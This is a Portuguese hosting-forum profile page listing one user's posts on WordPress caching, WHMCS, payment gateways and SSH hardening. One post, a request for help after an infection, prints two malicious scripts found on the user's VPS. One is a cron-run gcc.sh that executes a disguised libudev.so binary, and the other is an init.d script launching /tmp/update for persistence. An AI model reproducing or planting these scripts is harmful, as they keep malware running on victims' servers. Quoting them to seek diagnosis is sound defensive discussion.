Ir para conteúdo

Olá, visitante!

Entrar or Criar Conta Para ter acesso total ao nosso site. Ao se registrar, você poderá discutir, comentar, fazer downloads, análises e enviar mensagens privadas aos outros membros da comunidade.

PedroHenrique

Membro VIP
  • Total de itens

    280
  • Registro em

  • Última visita

Sobre PedroHenrique

  • Rank
    Kilobyte

Informações pessoais

  • Nome completo
    Pedro Henrique

Últimos Visitantes

470 visualizações
  1. PedroHenrique

    Dedicado para filmes adult

    Resposta simples e direta: nunca. Geralmente servidor para este tipo de conteúdo seria encontrado na Europa, mas por esse valor não vai encontrar.
  2. PedroHenrique

    Nginx e memcache são realmente eficientes?

    Obrigado a todos que tentaram ajudar. @AngelCosta, vou tentar fazer uma instalação dessa forma e ver o resultado. @abadan, entendo a sua colocação, mas no caso o wordpress não teve nada instalado, template é default da instalaçãoi padrão, apenas instalei e naveguei no site. A lentidão é horrivel, demora até para aparecer no browser o titulo do site e depois que aparece demora mais uns 10 segundo para abrir a página. O site só carrega na hora quando usa plugin de cache no wordpress. Cache e otimização a nível de servidor ou browser não tem nengum resultado. Eu sei que o nginx suporta muito mais conexões que o apache, eu tenho outros vps sem apache, somente com nginx + php-fpm e o resultado é muito bom, suporta muitos usuários simultâneos e pageviews, mas em relação a entregar conteúdo em cache para acelerar o carregamento das páginas, o resultado é zero.
  3. PedroHenrique

    Nginx e memcache são realmente eficientes?

    Boa noite pessoal. Queria saber dos colegas se essas aplicações são realmente eficientes. Vou explicar o motivo da pergunta. Eu contratei um cloud na digital ocean com 1 cpu e 2 GB de ram para hospedar apenas 1 site pessoal em Wordpress. Eu instalei nele apache + nginx + memcached, segui todos os tutoriais que tenho e outros na internet para otimizar o Apache e configurar o nginx para funcionar tanto como proxy reverso como gerando cache, além de instalar e configurar o memcached. A minha grande dúvida quanto a eficiência desse combinado veio depois que instalaei o Wordpress. Eu fiz a instalação dele usando o template default, que é bem simplezão, não adicionei nada, ou seja instalação default mesmo. O site demora quase 10 segundos para carregar, depois que carrega ele melhora um pouco o desempenho após as páginas ser acessada, imagino que seja por ter gerado cache no browser. Mas se eu fecho o navegador e abro novamente não tem rapidez nenhuma. Então eu vou no servidor e vejo lá no diretório /var/nginx/cache que os arquivos de cache são gerados, mas na prática parece que o servidor gera o cache mas na hora de entregar o conteúdo, ele não entrega do cache. Agora vem o grande X da questão, eu instalei o plugin wp super cache, configurei e o resultado é o seguinte: carregamento do site super rápido! Para tirar a dúvida da cabeça eu tiver uma ideia de girico kkkkk contratei um cloud na vulrt e outro na linode fiz todos os procedimentos, formatei varias vezes usei cpanel, vesta, cwp, lampp etc sempre com apache + nginx + mencached e nenhum entregou um site de forma rápida, mas quando instelei o plugin de cache no wordpress... a mágica aconteceu! Será que na questão de entregar conteúdo em cache e acelerar o carregamento dos sites nginx, memcached e outros são perda de tempo? Desculpe o tamanho do texto.
  4. PedroHenrique

    Cobrança sem endereço

    Paghiper acho que não precisa.
  5. PedroHenrique

    Bloquear o envio de email

    Boa tarde a todos. Venho aqui pedir uma ajuda sobre uma questão de eu nunca tinha percebido. Eu tenho um dedicado com cpanel, nele eu tenho um site wordpress com plugin contact form, tudo funcionando perfeitamente bem. Porém hoje eu parei para pensar e percebi que quando alguém envia alguma mensagem ela chega no email que configurei como destino, mas o email que o wordpress usa para que o formulario entregue a mensagem no meu email é [email protected] Esse email [email protected] não existe, ou seja, o script do formulario consegue fazer o envio sem autenticar. O que eu queria é saber como bloquear o envio dessa forma, e forçar o wordpress a enviar somente emails autenticados, ou seja, usar uma conta de email que exista no servidor, a senha etc. Agradeço.
  6. PedroHenrique

    Absam.io - plataforma de cloud computing

    E tem opção do cliente escolher em qual DC Brasil alocar o servidor?
  7. PedroHenrique

    Absam.io - plataforma de cloud computing

    No Brasil quais são os DCs? Sei que tinha colocation na Maxihost.
  8. PedroHenrique

    Malware gcc.sh

    Boa tarde Tenho um vps com vestacp que configurei a 30 dias, está vazio sem nenhum site ou programa. Ontem as 15:15 recebi email do servidor informando sobre erro na execução de um processo cron.hourly. Então quando fui verificar era um arquivo malicioso chamado gcc.sh. Então fui verificar o servidor e vi que foi criada uma entrada no crontab para executar este aquivo a cada 1 hora, no diretório /etc/cron.hourly foi criado esse arquivo gcc.sh e no diretório /et/init.d foi criado um arquivo chamado update. O conteudo dos aquivos é o seguinte: 1- gcc.sh #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done cp /lib/libudev.so /lib/libudev.so.6 /lib/libudev.so.6 Obs. eu recebi o aviso de erro do cron porque o arquivo libudev.so não existe no meu servidor, se existisse o script teria conseguido rodar. 2- update #!/bin/sh # chkconfig: 12345 90 90 # description: update ### BEGIN INIT INFO # Provides: update # Required-Start: # Required-Stop: # Default-Start: 1 2 3 4 5 # Default-Stop: # Short-Description: update ### END INIT INFO case $1 in start) /tmp/update ;; stop) ;; *) /tmp/update ;; esac Os amigos já tiveram problema com isso, sabem como pode ter sido feita essa infecção? Detalhes: 1- Esses arquivos gcc.sh e update não são localizados quando faz um busca com locate ou find. 2- Eu já vi em outra ocasião, esse mesmo arquivo gcc.sh dentro do public_html de algumas contas, em servidor cPanel, de um antigo cliente meu. Na época ele estava com problemas de spam e por coincidência encontrou esse arquivo. 3- Meu servidor está com a porta ssh alterada, senha complicada, firewall e fail2ban ativos, nos logs não consta comandos que não tenham sido executados por mim, nos logs de acesso não consta acessos ssh de IPs que não seja o meu.
  9. PedroHenrique

    Paghiper ou boleto facil

    Uso paghiper, as vezes a baixa automática não funciona, mas vale a pena pela tarifa cobrada e prazo para efetuar o saque.
  10. Uma vez precisei fazer isso e teve que ser manualmente, via transferência imap. Deu um pouco de trabalho mas funcionou. Agora se ficar enrolado, quem manda bem de vesta é o @RevendaHost .
  11. PedroHenrique

    Exibir mensagem de acordo com o tipo de domínio

    Bom dia Alguém saberia me dizer se existe algum hook ou até mesmo javascript no WHMCS, para que quando o cliente informe o dominio dele ao assinar uma hospedagem, quando estiver sendo feita a verificação se o dominio já existe no sistema, seja exibida uma mensagem de acordo com o tipo de tld.
  12. PedroHenrique

    Implementar segurança ssh

    Amigos bom dia. Acabei de contratar um VPS para para usar somente como backup. Instalei o Debian e proftpd, mas preciso implementar segurança em relação a SSH, nisso eu vou instalar o fail2ban, mas antes disso eu preciso tirar uma dúvida. Ao tentar acessar o servidor via SSH, se errar a senha 6x a conexão é encerrada, então que queria saber onde que fica configurado esse controle. Isso pode ser feito no sshd_config através da linha MaxAuthTries, porém não existe essa linha no conf, então ele pega essa configuração de 6 tentativas(nativo) em outro lugar. Alguém saberia me informar onde?
  13. PedroHenrique

    Editar cadastro de cliente whmcs

    @edvan, muito obrigado. Me ajudou bastante. Sem querer abusar da boa vontade, no campo UF a primeira opção vem com um " --- ", tem que alterar isso deixando o campo em branco quando não tiver nenhuma UF selecionada?
  14. PedroHenrique

    Editar cadastro de cliente whmcs

    Boa tarde Alguém saberia me informar qual ou quais arquivos eu devo editar, para alterar as opções dos campos UF, Cidade e País, no cadastro de clientes do whmcs?
  15. PedroHenrique

    Whmcs erro ao tentar configurar módulo

    Teria alguma previsão?

×